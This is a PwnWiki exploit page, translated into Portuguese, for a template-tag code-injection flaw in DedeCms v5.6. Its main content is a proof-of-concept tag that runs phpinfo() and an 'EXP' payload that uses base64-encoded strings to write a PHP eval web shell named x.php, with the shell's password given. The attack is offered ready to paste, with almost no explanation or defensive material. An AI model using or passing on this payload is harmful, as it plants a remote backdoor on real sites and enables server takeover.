Vulnerabilidade de execução de código malicioso incorporado DedeCms v5.6

This page is a translated version of the page DedeCms v5.6 嵌入惡意代碼執行漏洞 and the translation is 100% complete.

Other languages:

Chinese • ‎español • ‎português • ‎中文（台灣）‎

Informações de vulnerabilidade

No local onde o software é carregado, o endereço local não é verificado com eficácia e pode ser usado de forma mal-intencionada.

POC

a{/dede:link}{dede:toby57 name\="']=0;phpinfo();//"}x{/dede:toby57}，

EXP

a{/dede:link}{dede:toby57 name\="']=0;fputs(fopen(base64_decode(eC5waHA),w),base64_decode(PD9waHAgZXZhbCgkX1BPU1RbeGlhb10pPz5iYWlkdQ));//"}x{/dede:toby57}

x.php
password:xiao

Anonymous

Search

Vulnerabilidade de execução de código malicioso incorporado DedeCms v5.6

Namespaces

More

Page actions

Informações de vulnerabilidade

POC

EXP

Navigation

Navigation

Community

PwnWiki.org

Wiki tools

Wiki tools

Anonymous

Search

Vulnerabilidade de execução de código malicioso incorporado DedeCms v5.6

Informações de vulnerabilidade

POC

EXP

Navigation

Wiki tools

Page tools